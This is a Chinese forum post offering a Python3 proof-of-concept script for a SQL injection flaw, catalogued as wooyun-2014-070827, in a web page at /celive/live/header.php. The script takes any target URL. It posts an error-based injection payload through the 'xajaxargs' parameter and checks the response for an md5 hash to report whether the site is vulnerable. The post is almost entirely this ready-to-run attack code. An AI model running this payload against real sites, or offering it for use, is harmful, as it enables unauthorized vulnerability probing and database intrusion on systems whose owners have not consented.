wuaji 发表于 2018-10-20 14:28:25

Python3实现PoC——wooyun-2014-070827(SQL注入)

import requests  
import argparse
  

  
parser = argparse.ArgumentParser()
  
parser.add_argument('-u', dest="url")
  
args = parser.parse_args()
  
url = args.url
  

  
# 存在漏洞的页面
  
url += "/celive/live/header.php"
  
# 构造payload,用md5结果来验证
  
payload = {
  
    'xajax': 'LiveMessage',
  
    'xajaxargs': "1',(SELECT 1 FROM (select count(*),"
  
                        "concat(floor(rand(0)*2),(select md5(888)))a"
  
                        " from information_schema.tables group by a)b)"
  
                        ",'','','','1','127.0.0.1','2') #"
  
}
  

  
try:
  
    r = requests.post(url, data=payload)
  
    if(r.status_code == requests.codes.ok):
  
      if "0a113ef6b61820daa5611c870ed8d5ee" in r.text:
  
            print("{} is SQL_vul".format(url))
  
      else:
  
            print("{} is not SQL_vul".format(url))
  
except Exception as e:
  
    print(str(e))


页: [1]
查看完整版本: Python3实现PoC——wooyun-2014-070827(SQL注入)